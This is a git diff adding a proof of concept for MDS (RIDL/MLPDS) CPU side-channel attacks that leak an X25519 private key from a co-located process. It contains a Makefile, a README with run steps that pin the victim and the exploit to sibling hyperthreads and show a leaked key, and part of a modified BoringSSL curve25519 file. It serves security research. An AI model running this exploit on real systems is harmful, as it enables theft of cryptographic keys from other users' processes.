diff --git a/pocs/cpus/mds-x25519/Makefile b/pocs/cpus/mds-x25519/Makefile
new file mode 100644
index 00000000..91ec33f7
--- /dev/null
+++ b/pocs/cpus/mds-x25519/Makefile
@@ -0,0 +1,21 @@
+.PHONY: all clean
+
+all: leak_evict_x25519 leak_intermediate_x25519 leak_multiprocess x25519_victim
+
+CFLAGS=-O3 -mrtm -static -masm=intel
+
+boringssl/crypto/curve25519/fake_x25519.c: fake_x25519.c
+	git clone https://boringssl.googlesource.com/boringssl || true
+	cp fake_x25519.c boringssl/crypto/curve25519/fake_x25519.c
+
+leak_intermediate_x25519: boringssl/crypto/curve25519/fake_x25519.c leak_intermediate_x25519.c
+	cc $^  -o $@ $(CFLAGS) -Iboringssl/include
+
+leak_multiprocess: boringssl/crypto/curve25519/fake_x25519.c leak_multiprocess.c
+	cc $^  -o $@ $(CFLAGS) -Iboringssl/include
+
+x25519_victim: boringssl/crypto/curve25519/curve25519.c x25519_victim.c
+	cc $^  -o $@ $(CFLAGS) -Iboringssl/include -lssl -lcrypto
+
+clean:
+	- rm -rf leak_evict_x25519 leak_intermediate_x25519 leak_multiprocess x25519_victim boringssl
diff --git a/pocs/cpus/mds-x25519/README.md b/pocs/cpus/mds-x25519/README.md
new file mode 100644
index 00000000..67da441e
--- /dev/null
+++ b/pocs/cpus/mds-x25519/README.md
@@ -0,0 +1,57 @@
+
+
+# MDS exploits
+
+## How to run
+
+The RIDL exploit, `leak_evict_x25519.c` unfortunately targets an internal
+server, so you won't be able to reproduce our results.
+
+MLPDS exploit, although it targets the same server, does not depend on its
+memory layout etc. - so we prepared a custom victim that just calls `X25519`
+function in an infinite loop. To run, first compile the code:
+
+```
+make
+```
+
+This will also clone the boringssl repository (it's a dependency).
+Check how many cores your CPU has:
+
+```
+nproc --all
+```
+
+For my workstation, it prints `12`, which means I have 6 cores (with
+hyperthreading doubling the number). Run the victim:
+
+```
+taskset -a -c 2 ./x25519_victim
+```
+
+In another terminal, run the exploit:
+
+```
+taskset -a -c 8 ./leak_intermediate_x25519 <<< "1 2 3 4 5 6 7 8 9 a b c d e f 10 11 12 13 14 15 16 17 18 19 1a 1b 1c 1d 1e 1f 20"
+```
+
+The `1 2 3...` string is the client private key used in X25519.
+Note that I pin the two processes to cores 2 and 8, which are 6 apart - meaning
+they occupy sibling threads. You should see some intermediate output pretty quickly, and
+after 255 iterations (say 10 minutes, depending on CPU), the process will finish.
+The last line will show the leaked secret:
+
+```
+Secret: 70 72 69 76 74 65 73 74 31 32 33 34 35 36 37 38 73 6f 6d 65 6d 6f 72 65 62 69 74 73 41 42 43 44
+```
+
+If you decode the hexadecimal, it says `privtest12345678somemorebitsABCD`, which
+was the private key hardcoded in `x25519_victim.c`.
+
+If you wait several minutes and always get only `--- diff_abs 0 (0 vs. 0, total 0)`
+result, something's wrong. You should check if hyperthreading is enabled, and
+that your CPU supports TSX and it's not disabled.
+
+If you want to try the multithreaded exploit, `leak_multiprocess.c`, before
+compiling change the `#define CPU_NUM 6` to the actual number of cores in your
+CPU. Other than that, the usage is the same.
diff --git a/pocs/cpus/mds-x25519/fake_x25519.c b/pocs/cpus/mds-x25519/fake_x25519.c
new file mode 100644
index 00000000..71f4deda
--- /dev/null
+++ b/pocs/cpus/mds-x25519/fake_x25519.c
@@ -0,0 +1,1850 @@
+/* Copyright (c) 2020, Google Inc.
+ *
+ * Permission to use, copy, modify, and/or distribute this software for any
+ * purpose with or without fee is hereby granted, provided that the above
+ * copyright notice and this permission notice appear in all copies.
+ *
+ * THE SOFTWARE IS PROVIDED "AS IS" AND THE AUTHOR DISCLAIMS ALL WARRANTIES
+ * WITH REGARD TO THIS SOFTWARE INCLUDING ALL IMPLIED WARRANTIES OF
+ * MERCHANTABILITY AND FITNESS. IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR ANY
+ * SPECIAL, DIRECT, INDIRECT, OR CONSEQUENTIAL DAMAGES OR ANY DAMAGES
+ * WHATSOEVER RESULTING FROM LOSS OF USE, DATA OR PROFITS, WHETHER IN AN ACTION
+ * OF CONTRACT, NEGLIGENCE OR OTHER TORTIOUS ACTION, ARISING OUT OF OR IN
+ * CONNECTION WITH THE USE OR PERFORMANCE OF THIS SOFTWARE. */
+// Some of this code is taken from the ref10 version of Ed25519 in SUPERCOP
+// 20141124 (http://bench.cr.yp.to/supercop.html). That code is released as
+// public domain. Other parts have been replaced to call into code generated by
+// Fiat (https://github.com/mit-plv/fiat-crypto) in //third_party/fiat.
+//
+// The field functions are shared by Ed25519 and X25519 where possible.
+#include <openssl/curve25519.h>
+#include <assert.h>
+#include <string.h>
+#include <openssl/mem.h>
+#include <openssl/rand.h>
+#include <openssl/sha.h>
+#include <openssl/type_check.h>
+#include "internal.h"
+#include "../internal.h"
+// Various pre-computed constants.
+#include "./curve25519_tables.h"
+#if defined(OPENSSL_NO_ASM)
+#define FIAT_25519_NO_ASM
+#endif
+#if defined(BORINGSSL_CURVE25519_64BIT)
+#include "../../third_party/fiat/curve25519_64.h"
+#else
+#include "../../third_party/fiat/curve25519_32.h"
+#endif  // BORINGSSL_CURVE25519_64BIT
+// Low-level intrinsic operations
+static uint64_t load_3(const uint8_t *in) {
+  uint64_t result;
+  result = (uint64_t)in[0];
+  result |= ((uint64_t)in[1]) << 8;
+  result |= ((uint64_t)in[2]) << 16;
+  return result;
+}
+static uint64_t load_4(const uint8_t *in) {
+  uint64_t result;
+  result = (uint64_t)in[0];
+  result |= ((uint64_t)in[1]) << 8;
+  result |= ((uint64_t)in[2]) << 16;
+  result |= ((uint64_t)in[3]) << 24;
+  return result;
+}
+// Field operations.
+#if defined(BORINGSSL_CURVE25519_64BIT)
+typedef uint64_t fe_limb_t;
+#define FE_NUM_LIMBS 5
+// assert_fe asserts that |f| satisfies bounds:
+//
+//  [[0x0 ~> 0x8cccccccccccc],
+//   [0x0 ~> 0x8cccccccccccc],
+//   [0x0 ~> 0x8cccccccccccc],
+//   [0x0 ~> 0x8cccccccccccc],
+//   [0x0 ~> 0x8cccccccccccc]]
+//
+// See comments in curve25519_64.h for which functions use these bounds for
+// inputs or outputs.
+#define assert_fe(f)                                                    \
+  do {                                                                  \
+    for (unsigned _assert_fe_i = 0; _assert_fe_i < 5; _assert_fe_i++) { \
+      assert(f[_assert_fe_i] <= UINT64_C(0x8cccccccccccc));             \
+    }                                                                   \
+  } while (0)
+// assert_fe_loose asserts that |f| satisfies bounds:
+//
+//  [[0x0 ~> 0x1a666666666664],
+//   [0x0 ~> 0x1a666666666664],
+//   [0x0 ~> 0x1a666666666664],
+//   [0x0 ~> 0x1a666666666664],
+//   [0x0 ~> 0x1a666666666664]]
+//
+// See comments in curve25519_64.h for which functions use these bounds for
+// inputs or outputs.
+#define assert_fe_loose(f)                                              \
+  do {                                                                  \
+    for (unsigned _assert_fe_i = 0; _assert_fe_i < 5; _assert_fe_i++) { \
+      assert(f[_assert_fe_i] <= UINT64_C(0x1a666666666664));            \
+    }                                                                   \
+  } while (0)
+#else
+typedef uint32_t fe_limb_t;
+#define FE_NUM_LIMBS 10
+// assert_fe asserts that |f| satisfies bounds:
+//
+//  [[0x0 ~> 0x4666666], [0x0 ~> 0x2333333],
+//   [0x0 ~> 0x4666666], [0x0 ~> 0x2333333],
+//   [0x0 ~> 0x4666666], [0x0 ~> 0x2333333],
+//   [0x0 ~> 0x4666666], [0x0 ~> 0x2333333],
+//   [0x0 ~> 0x4666666], [0x0 ~> 0x2333333]]
+//
+// See comments in curve25519_32.h for which functions use these bounds for
+// inputs or outputs.
+#define assert_fe(f)                                                     \
+  do {                                                                   \
+    for (unsigned _assert_fe_i = 0; _assert_fe_i < 10; _assert_fe_i++) { \
+      assert(f[_assert_fe_i] <=                                          \
+             ((_assert_fe_i & 1) ? 0x2333333u : 0x4666666u));            \
+    }                                                                    \
+  } while (0)
+// assert_fe_loose asserts that |f| satisfies bounds:
+//
+//  [[0x0 ~> 0xd333332], [0x0 ~> 0x6999999],
+//   [0x0 ~> 0xd333332], [0x0 ~> 0x6999999],
+//   [0x0 ~> 0xd333332], [0x0 ~> 0x6999999],
+//   [0x0 ~> 0xd333332], [0x0 ~> 0x6999999],
+//   [0x0 ~> 0xd333332], [0x0 ~> 0x6999999]]
+//
+// See comments in curve25519_32.h for which functions use these bounds for
+// inputs or outputs.
+#define assert_fe_loose(f)                                               \
+  do {                                                                   \
+    for (unsigned _assert_fe_i = 0; _assert_fe_i < 10; _assert_fe_i++) { \
+      assert(f[_assert_fe_i] <=                                          \
+             ((_assert_fe_i & 1) ? 0x6999999u : 0xd333332u));            \
+    }                                                                    \
+  } while (0)
+#endif  // BORINGSSL_CURVE25519_64BIT
+//OPENSSL_STATIC_ASSERT(sizeof(fe) == sizeof(fe_limb_t) * FE_NUM_LIMBS,
+//                      "fe_limb_t[FE_NUM_LIMBS] is inconsistent with fe");
+#define OPENSSL_STATIC_ASSERT(...)
+static void fe_frombytes_strict(fe *h, const uint8_t s[32]) {
+  // |fiat_25519_from_bytes| requires the top-most bit be clear.
+  assert((s[31] & 0x80) == 0);
+  fiat_25519_from_bytes(h->v, s);
+  assert_fe(h->v);
+}
+static void fe_frombytes(fe *h, const uint8_t s[32]) {
+  uint8_t s_copy[32];
+  OPENSSL_memcpy(s_copy, s, 32);
+  s_copy[31] &= 0x7f;
+  fe_frombytes_strict(h, s_copy);
+}
+static void fe_tobytes(uint8_t s[32], const fe *f) {
+  assert_fe(f->v);
+  fiat_25519_to_bytes(s, f->v);
+}
+// h = 0
+static void fe_0(fe *h) {
+  OPENSSL_memset(h, 0, sizeof(fe));
+}
+static void fe_loose_0(fe_loose *h) {
+  OPENSSL_memset(h, 0, sizeof(fe_loose));
+}
+// h = 1
+static void fe_1(fe *h) {
+  OPENSSL_memset(h, 0, sizeof(fe));
+  h->v[0] = 1;
+}
+static void fe_loose_1(fe_loose *h) {
+  OPENSSL_memset(h, 0, sizeof(fe_loose));
+  h->v[0] = 1;
+}
+// h = f + g
+// Can overlap h with f or g.
+static void fe_add(fe_loose *h, const fe *f, const fe *g) {
+  assert_fe(f->v);
+  assert_fe(g->v);
+  fiat_25519_add(h->v, f->v, g->v);
+  assert_fe_loose(h->v);
+}
+// h = f - g
+// Can overlap h with f or g.
+static void fe_sub(fe_loose *h, const fe *f, const fe *g) {
+  assert_fe(f->v);
+  assert_fe(g->v);
+  fiat_25519_sub(h->v, f->v, g->v);
+  assert_fe_loose(h->v);
+}
+static void fe_carry(fe *h, const fe_loose* f) {
+  assert_fe_loose(f->v);
+  fiat_25519_carry(h->v, f->v);
+  assert_fe(h->v);
+}
+static void fe_mul_impl(fe_limb_t out[FE_NUM_LIMBS],
+                        const fe_limb_t in1[FE_NUM_LIMBS],
+                        const fe_limb_t in2[FE_NUM_LIMBS]) {
+  assert_fe_loose(in1);
+  assert_fe_loose(in2);
+  fiat_25519_carry_mul(out, in1, in2);
+  assert_fe(out);
+}
+static void fe_mul_ltt(fe_loose *h, const fe *f, const fe *g) {
+  fe_mul_impl(h->v, f->v, g->v);
+}
+static void fe_mul_llt(fe_loose *h, const fe_loose *f, const fe *g) {
+  fe_mul_impl(h->v, f->v, g->v);
+}
+static void fe_mul_ttt(fe *h, const fe *f, const fe *g) {
+  fe_mul_impl(h->v, f->v, g->v);
+}
+static void fe_mul_tlt(fe *h, const fe_loose *f, const fe *g) {
+  fe_mul_impl(h->v, f->v, g->v);
+}
+static void fe_mul_ttl(fe *h, const fe *f, const fe_loose *g) {
+  fe_mul_impl(h->v, f->v, g->v);
+}
+static void fe_mul_tll(fe *h, const fe_loose *f, const fe_loose *g) {
+  fe_mul_impl(h->v, f->v, g->v);
+}
+static void fe_sq_tl(fe *h, const fe_loose *f) {
+  assert_fe_loose(f->v);
+  fiat_25519_carry_square(h->v, f->v);
+  assert_fe(h->v);
+}
+static void fe_sq_tt(fe *h, const fe *f) {
+  assert_fe_loose(f->v);
+  fiat_25519_carry_square(h->v, f->v);
+  assert_fe(h->v);
+}
+// Replace (f,g) with (g,f) if b == 1;
+// replace (f,g) with (f,g) if b == 0.
+//
+// Preconditions: b in {0,1}.
+static void fe_cswap(fe *f, fe *g, fe_limb_t b) {
+  b = 0-b;
+  for (unsigned i = 0; i < FE_NUM_LIMBS; i++) {
+    fe_limb_t x = f->v[i] ^ g->v[i];
+    x &= b;
+    f->v[i] ^= x;
+    g->v[i] ^= x;
+  }
+}
+static void fe_mul121666(fe *h, const fe_loose *f) {
+  assert_fe_loose(f->v);
+  fiat_25519_carry_scmul_121666(h->v, f->v);
+  assert_fe(h->v);
+}
+// h = -f
+static void fe_neg(fe_loose *h, const fe *f) {
+  assert_fe(f->v);
+  fiat_25519_opp(h->v, f->v);
+  assert_fe_loose(h->v);
+}
+// Replace (f,g) with (g,g) if b == 1;
+// replace (f,g) with (f,g) if b == 0.
+//
+// Preconditions: b in {0,1}.
+static void fe_cmov(fe_loose *f, const fe_loose *g, fe_limb_t b) {
+  // Silence an unused function warning. |fiat_25519_selectznz| isn't quite the
+  // calling convention the rest of this code wants, so implement it by hand.
+  //
+  // TODO(davidben): Switch to fiat's calling convention, or ask fiat to emit a
+  // different one.
+  (void)fiat_25519_selectznz;
+  b = 0-b;
+  for (unsigned i = 0; i < FE_NUM_LIMBS; i++) {
+    fe_limb_t x = f->v[i] ^ g->v[i];
+    x &= b;
+    f->v[i] ^= x;
+  }
+}
+// h = f
+static void fe_copy(fe *h, const fe *f) {
+  OPENSSL_memmove(h, f, sizeof(fe));
+}
+static void fe_copy_lt(fe_loose *h, const fe *f) {
+  OPENSSL_STATIC_ASSERT(sizeof(fe_loose) == sizeof(fe),
+                        "fe and fe_loose mismatch");
+  OPENSSL_memmove(h, f, sizeof(fe));
+}
+#if !defined(OPENSSL_SMALL)
+static void fe_copy_ll(fe_loose *h, const fe_loose *f) {
+  OPENSSL_memmove(h, f, sizeof(fe_loose));
+}
+#endif // !defined(OPENSSL_SMALL)
+static void fe_loose_invert(fe *out, const fe_loose *z) {
+  fe t0;
+  fe t1;
+  fe t2;
+  fe t3;
+  int i;
+  fe_sq_tl(&t0, z);
+  fe_sq_tt(&t1, &t0);
+  for (i = 1; i < 2; ++i) {
+    fe_sq_tt(&t1, &t1);
+  }
+  fe_mul_tlt(&t1, z, &t1);
+  fe_mul_ttt(&t0, &t0, &t1);
+  fe_sq_tt(&t2, &t0);
+  fe_mul_ttt(&t1, &t1, &t2);
+  fe_sq_tt(&t2, &t1);
+  for (i = 1; i < 5; ++i) {
+    fe_sq_tt(&t2, &t2);
+  }
+  fe_mul_ttt(&t1, &t2, &t1);
+  fe_sq_tt(&t2, &t1);
+  for (i = 1; i < 10; ++i) {
+    fe_sq_tt(&t2, &t2);
+  }
+  fe_mul_ttt(&t2, &t2, &t1);
+  fe_sq_tt(&t3, &t2);
+  for (i = 1; i < 20; ++i) {
+    fe_sq_tt(&t3, &t3);
+  }
+  fe_mul_ttt(&t2, &t3, &t2);
+  fe_sq_tt(&t2, &t2);
+  for (i = 1; i < 10; ++i) {
+    fe_sq_tt(&t2, &t2);
+  }
+  fe_mul_ttt(&t1, &t2, &t1);
+  fe_sq_tt(&t2, &t1);
+  for (i = 1; i < 50; ++i) {
+    fe_sq_tt(&t2, &t2);
+  }
+  fe_mul_ttt(&t2, &t2, &t1);
+  fe_sq_tt(&t3, &t2);
+  for (i = 1; i < 100; ++i) {
+    fe_sq_tt(&t3, &t3);
+  }
+  fe_mul_ttt(&t2, &t3, &t2);
+  fe_sq_tt(&t2, &t2);
+  for (i = 1; i < 50; ++i) {
+    fe_sq_tt(&t2, &t2);
+  }
+  fe_mul_ttt(&t1, &t2, &t1);
+  fe_sq_tt(&t1, &t1);
+  for (i = 1; i < 5; ++i) {
+    fe_sq_tt(&t1, &t1);
+  }
+  fe_mul_ttt(out, &t1, &t0);
+}
+static void fe_invert(fe *out, const fe *z) {
+  fe_loose l;
+  fe_copy_lt(&l, z);
+  fe_loose_invert(out, &l);
+}
+// return 0 if f == 0
+// return 1 if f != 0
+static int fe_isnonzero(const fe_loose *f) {
+  fe tight;
+  fe_carry(&tight, f);
+  uint8_t s[32];
+  fe_tobytes(s, &tight);
+  static const uint8_t zero[32] = {0};
+  return CRYPTO_memcmp(s, zero, sizeof(zero)) != 0;
+}
+// return 1 if f is in {1,3,5,...,q-2}
+// return 0 if f is in {0,2,4,...,q-1}
+static int fe_isnegative(const fe *f) {
+  uint8_t s[32];
+  fe_tobytes(s, f);
+  return s[0] & 1;
+}
+static void fe_sq2_tt(fe *h, const fe *f) {
+  // h = f^2
+  fe_sq_tt(h, f);
+  // h = h + h
+  fe_loose tmp;
+  fe_add(&tmp, h, h);
+  fe_carry(h, &tmp);
+}
+static void fe_pow22523(fe *out, const fe *z) {
+  fe t0;
+  fe t1;
+  fe t2;
+  int i;
+  fe_sq_tt(&t0, z);
+  fe_sq_tt(&t1, &t0);
+  for (i = 1; i < 2; ++i) {
+    fe_sq_tt(&t1, &t1);
+  }
+  fe_mul_ttt(&t1, z, &t1);
+  fe_mul_ttt(&t0, &t0, &t1);
+  fe_sq_tt(&t0, &t0);
+  fe_mul_ttt(&t0, &t1, &t0);
+  fe_sq_tt(&t1, &t0);
+  for (i = 1; i < 5; ++i) {
+    fe_sq_tt(&t1, &t1);
+  }
+  fe_mul_ttt(&t0, &t1, &t0);
+  fe_sq_tt(&t1, &t0);
+  for (i = 1; i < 10; ++i) {
+    fe_sq_tt(&t1, &t1);
+  }
+  fe_mul_ttt(&t1, &t1, &t0);
+  fe_sq_tt(&t2, &t1);
+  for (i = 1; i < 20; ++i) {
+    fe_sq_tt(&t2, &t2);
+  }
+  fe_mul_ttt(&t1, &t2, &t1);
+  fe_sq_tt(&t1, &t1);
+  for (i = 1; i < 10; ++i) {
+    fe_sq_tt(&t1, &t1);
+  }
+  fe_mul_ttt(&t0, &t1, &t0);
+  fe_sq_tt(&t1, &t0);
+  for (i = 1; i < 50; ++i) {
+    fe_sq_tt(&t1, &t1);
+  }
+  fe_mul_ttt(&t1, &t1, &t0);
+  fe_sq_tt(&t2, &t1);
+  for (i = 1; i < 100; ++i) {
+    fe_sq_tt(&t2, &t2);
+  }
+  fe_mul_ttt(&t1, &t2, &t1);
+  fe_sq_tt(&t1, &t1);
+  for (i = 1; i < 50; ++i) {
+    fe_sq_tt(&t1, &t1);
+  }
+  fe_mul_ttt(&t0, &t1, &t0);
+  fe_sq_tt(&t0, &t0);
+  for (i = 1; i < 2; ++i) {
+    fe_sq_tt(&t0, &t0);
+  }
+  fe_mul_ttt(out, &t0, z);
+}
+// Group operations.
+void x25519_ge_tobytes(uint8_t s[32], const ge_p2 *h) {
+  fe recip;
+  fe x;
+  fe y;
+  fe_invert(&recip, &h->Z);
+  fe_mul_ttt(&x, &h->X, &recip);
+  fe_mul_ttt(&y, &h->Y, &recip);
+  fe_tobytes(s, &y);
+  s[31] ^= fe_isnegative(&x) << 7;
+}
+static void ge_p3_tobytes(uint8_t s[32], const ge_p3 *h) {
+  fe recip;
+  fe x;
+  fe y;
+  fe_invert(&recip, &h->Z);
+  fe_mul_ttt(&x, &h->X, &recip);
+  fe_mul_ttt(&y, &h->Y, &recip);
+  fe_tobytes(s, &y);
+  s[31] ^= fe_isnegative(&x) << 7;
+}
+static void ge_p2_0(ge_p2 *h) {
+  fe_0(&h->X);
+  fe_1(&h->Y);
+  fe_1(&h->Z);
+}
+static void ge_p3_0(ge_p3 *h) {
+  fe_0(&h->X);
+  fe_1(&h->Y);
+  fe_1(&h->Z);
+  fe_0(&h->T);
+}
+static void ge_cached_0(ge_cached *h) {
+  fe_loose_1(&h->YplusX);
+  fe_loose_1(&h->YminusX);
+  fe_loose_1(&h->Z);
+  fe_loose_0(&h->T2d);
+}
+static void ge_precomp_0(ge_precomp *h) {
+  fe_loose_1(&h->yplusx);
+  fe_loose_1(&h->yminusx);
+  fe_loose_0(&h->xy2d);
+}
+// r = p
+static void ge_p3_to_p2(ge_p2 *r, const ge_p3 *p) {
+  fe_copy(&r->X, &p->X);
+  fe_copy(&r->Y, &p->Y);
+  fe_copy(&r->Z, &p->Z);
+}
+// r = p
+void x25519_ge_p3_to_cached(ge_cached *r, const ge_p3 *p) {
+  fe_add(&r->YplusX, &p->Y, &p->X);
+  fe_sub(&r->YminusX, &p->Y, &p->X);
+  fe_copy_lt(&r->Z, &p->Z);
+  fe_mul_ltt(&r->T2d, &p->T, &d2);
+}
+// r = p
+void x25519_ge_p1p1_to_p2(ge_p2 *r, const ge_p1p1 *p) {
+  fe_mul_tll(&r->X, &p->X, &p->T);
+  fe_mul_tll(&r->Y, &p->Y, &p->Z);
+  fe_mul_tll(&r->Z, &p->Z, &p->T);
+}
+// r = p
+void x25519_ge_p1p1_to_p3(ge_p3 *r, const ge_p1p1 *p) {
+  fe_mul_tll(&r->X, &p->X, &p->T);
+  fe_mul_tll(&r->Y, &p->Y, &p->Z);
+  fe_mul_tll(&r->Z, &p->Z, &p->T);
+  fe_mul_tll(&r->T, &p->X, &p->Y);
+}
+// r = p
+static void ge_p1p1_to_cached(ge_cached *r, const ge_p1p1 *p) {
+  ge_p3 t;
+  x25519_ge_p1p1_to_p3(&t, p);
+  x25519_ge_p3_to_cached(r, &t);
+}
+// r = 2 * p
+static void ge_p2_dbl(ge_p1p1 *r, const ge_p2 *p) {
+  fe trX, trZ, trT;
+  fe t0;
+  fe_sq_tt(&trX, &p->X);
+  fe_sq_tt(&trZ, &p->Y);
+  fe_sq2_tt(&trT, &p->Z);
+  fe_add(&r->Y, &p->X, &p->Y);
+  fe_sq_tl(&t0, &r->Y);
+  fe_add(&r->Y, &trZ, &trX);
+  fe_sub(&r->Z, &trZ, &trX);
+  fe_carry(&trZ, &r->Y);
+  fe_sub(&r->X, &t0, &trZ);
+  fe_carry(&trZ, &r->Z);
+  fe_sub(&r->T, &trT, &trZ);
+}
+// r = 2 * p
+static void ge_p3_dbl(ge_p1p1 *r, const ge_p3 *p) {
+  ge_p2 q;
+  ge_p3_to_p2(&q, p);
+  ge_p2_dbl(r, &q);
+}
+// r = p + q
+static void ge_madd(ge_p1p1 *r, const ge_p3 *p, const ge_precomp *q) {
+  fe trY, trZ, trT;
+  fe_add(&r->X, &p->Y, &p->X);
+  fe_sub(&r->Y, &p->Y, &p->X);
+  fe_mul_tll(&trZ, &r->X, &q->yplusx);
+  fe_mul_tll(&trY, &r->Y, &q->yminusx);
+  fe_mul_tlt(&trT, &q->xy2d, &p->T);
+  fe_add(&r->T, &p->Z, &p->Z);
+  fe_sub(&r->X, &trZ, &trY);
+  fe_add(&r->Y, &trZ, &trY);
+  fe_carry(&trZ, &r->T);
+  fe_add(&r->Z, &trZ, &trT);
+  fe_sub(&r->T, &trZ, &trT);
+}
+// r = p - q
+static void ge_msub(ge_p1p1 *r, const ge_p3 *p, const ge_precomp *q) {
+  fe trY, trZ, trT;
+  fe_add(&r->X, &p->Y, &p->X);
+  fe_sub(&r->Y, &p->Y, &p->X);
+  fe_mul_tll(&trZ, &r->X, &q->yminusx);
+  fe_mul_tll(&trY, &r->Y, &q->yplusx);
+  fe_mul_tlt(&trT, &q->xy2d, &p->T);
+  fe_add(&r->T, &p->Z, &p->Z);
+  fe_sub(&r->X, &trZ, &trY);
+  fe_add(&r->Y, &trZ, &trY);
+  fe_carry(&trZ, &r->T);
+  fe_sub(&r->Z, &trZ, &trT);
+  fe_add(&r->T, &trZ, &trT);
+}
+// r = p + q
+void x25519_ge_add(ge_p1p1 *r, const ge_p3 *p, const ge_cached *q) {
+  fe trX, trY, trZ, trT;
+  fe_add(&r->X, &p->Y, &p->X);
+  fe_sub(&r->Y, &p->Y, &p->X);
+  fe_mul_tll(&trZ, &r->X, &q->YplusX);
+  fe_mul_tll(&trY, &r->Y, &q->YminusX);
+  fe_mul_tlt(&trT, &q->T2d, &p->T);
+  fe_mul_ttl(&trX, &p->Z, &q->Z);
+  fe_add(&r->T, &trX, &trX);
+  fe_sub(&r->X, &trZ, &trY);
+  fe_add(&r->Y, &trZ, &trY);
+  fe_carry(&trZ, &r->T);
+  fe_add(&r->Z, &trZ, &trT);
+  fe_sub(&r->T, &trZ, &trT);
+}
+// r = p - q
+void x25519_ge_sub(ge_p1p1 *r, const ge_p3 *p, const ge_cached *q) {
+  fe trX, trY, trZ, trT;
+  fe_add(&r->X, &p->Y, &p->X);
+  fe_sub(&r->Y, &p->Y, &p->X);
+  fe_mul_tll(&trZ, &r->X, &q->YminusX);
+  fe_mul_tll(&trY, &r->Y, &q->YplusX);
+  fe_mul_tlt(&trT, &q->T2d, &p->T);
+  fe_mul_ttl(&trX, &p->Z, &q->Z);
+  fe_add(&r->T, &trX, &trX);
+  fe_sub(&r->X, &trZ, &trY);
+  fe_add(&r->Y, &trZ, &trY);
+  fe_carry(&trZ, &r->T);
+  fe_sub(&r->Z, &trZ, &trT);
+  fe_add(&r->T, &trZ, &trT);
+}
+static uint8_t equal(signed char b, signed char c) {
+  uint8_t ub = b;
+  uint8_t uc = c;
+  uint8_t x = ub ^ uc;  // 0: yes; 1..255: no
+  uint32_t y = x;       // 0: yes; 1..255: no
+  y -= 1;               // 4294967295: yes; 0..254: no
+  y >>= 31;             // 1: yes; 0: no
+  return y;
+}
+static void cmov(ge_precomp *t, const ge_precomp *u, uint8_t b) {
+  fe_cmov(&t->yplusx, &u->yplusx, b);
+  fe_cmov(&t->yminusx, &u->yminusx, b);
+  fe_cmov(&t->xy2d, &u->xy2d, b);
+}
+void x25519_ge_scalarmult_small_precomp(
+    ge_p3 *h, const uint8_t a[32], const uint8_t precomp_table[15 * 2 * 32]) {
+  // precomp_table is first expanded into matching |ge_precomp|
+  // elements.
+  ge_precomp multiples[15];
+  unsigned i;
+  for (i = 0; i < 15; i++) {
+    // The precomputed table is assumed to already clear the top bit, so
+    // |fe_frombytes_strict| may be used directly.
+    const uint8_t *bytes = &precomp_table[i*(2 * 32)];
+    fe x, y;
+    fe_frombytes_strict(&x, bytes);
+    fe_frombytes_strict(&y, bytes + 32);
+    ge_precomp *out = &multiples[i];
+    fe_add(&out->yplusx, &y, &x);
+    fe_sub(&out->yminusx, &y, &x);
+    fe_mul_ltt(&out->xy2d, &x, &y);
+    fe_mul_llt(&out->xy2d, &out->xy2d, &d2);
+  }
+  // See the comment above |k25519SmallPrecomp| about the structure of the
+  // precomputed elements. This loop does 64 additions and 64 doublings to
+  // calculate the result.
+  ge_p3_0(h);
+  for (i = 63; i < 64; i--) {
+    unsigned j;
+    signed char index = 0;
+    for (j = 0; j < 4; j++) {
+      const uint8_t bit = 1 & (a[(8 * j) + (i / 8)] >> (i & 7));
+      index |= (bit << j);
+    }
+    ge_precomp e;
+    ge_precomp_0(&e);
+    for (j = 1; j < 16; j++) {
+      cmov(&e, &multiples[j-1], equal(index, j));
+    }
+    ge_cached cached;
+    ge_p1p1 r;
+    x25519_ge_p3_to_cached(&cached, h);
+    x25519_ge_add(&r, h, &cached);
+    x25519_ge_p1p1_to_p3(h, &r);
+    ge_madd(&r, h, &e);
+    x25519_ge_p1p1_to_p3(h, &r);
+  }
+}
+#if defined(OPENSSL_SMALL)
+void x25519_ge_scalarmult_base(ge_p3 *h, const uint8_t a[32]) {
+  x25519_ge_scalarmult_small_precomp(h, a, k25519SmallPrecomp);
+}
+#else
+static uint8_t negative(signed char b) {
+  uint32_t x = b;
+  x >>= 31;  // 1: yes; 0: no
+  return x;
+}
+static void table_select(ge_precomp *t, int pos, signed char b) {
+  ge_precomp minust;
+  uint8_t bnegative = negative(b);
+  uint8_t babs = b - ((uint8_t)((-bnegative) & b) << 1);
+  ge_precomp_0(t);
+  cmov(t, &k25519Precomp[pos][0], equal(babs, 1));
+  cmov(t, &k25519Precomp[pos][1], equal(babs, 2));
+  cmov(t, &k25519Precomp[pos][2], equal(babs, 3));
+  cmov(t, &k25519Precomp[pos][3], equal(babs, 4));
+  cmov(t, &k25519Precomp[pos][4], equal(babs, 5));
+  cmov(t, &k25519Precomp[pos][5], equal(babs, 6));
+  cmov(t, &k25519Precomp[pos][6], equal(babs, 7));
+  cmov(t, &k25519Precomp[pos][7], equal(babs, 8));
+  fe_copy_ll(&minust.yplusx, &t->yminusx);
+  fe_copy_ll(&minust.yminusx, &t->yplusx);
+  // NOTE: the input table is canonical, but types don't encode it
+  fe tmp;
+  fe_carry(&tmp, &t->xy2d);
+  fe_neg(&minust.xy2d, &tmp);
+  cmov(t, &minust, bnegative);
+}
+// h = a * B
+// where a = a[0]+256*a[1]+...+256^31 a[31]
+// B is the Ed25519 base point (x,4/5) with x positive.
+//
+// Preconditions:
+//   a[31] <= 127
+void x25519_ge_scalarmult_base(ge_p3 *h, const uint8_t a[32]) {
+  signed char e[64];
+  signed char carry;
+  ge_p1p1 r;
+  ge_p2 s;
+  ge_precomp t;
+  int i;
+  for (i = 0; i < 32; ++i) {
+    e[2 * i + 0] = (a[i] >> 0) & 15;
+    e[2 * i + 1] = (a[i] >> 4) & 15;
+  }
+  // each e[i] is between 0 and 15
+  // e[63] is between 0 and 7
+  carry = 0;
+  for (i = 0; i < 63; ++i) {
+    e[i] += carry;
+    carry = e[i] + 8;
+    carry >>= 4;
+    e[i] -= carry << 4;
+  }
+  e[63] += carry;
+  // each e[i] is between -8 and 8
+  ge_p3_0(h);
+  for (i = 1; i < 64; i += 2) {
+    table_select(&t, i / 2, e[i]);
+    ge_madd(&r, h, &t);
+    x25519_ge_p1p1_to_p3(h, &r);
+  }
+  ge_p3_dbl(&r, h);
+  x25519_ge_p1p1_to_p2(&s, &r);
+  ge_p2_dbl(&r, &s);
+  x25519_ge_p1p1_to_p2(&s, &r);
+  ge_p2_dbl(&r, &s);
+  x25519_ge_p1p1_to_p2(&s, &r);
+  ge_p2_dbl(&r, &s);
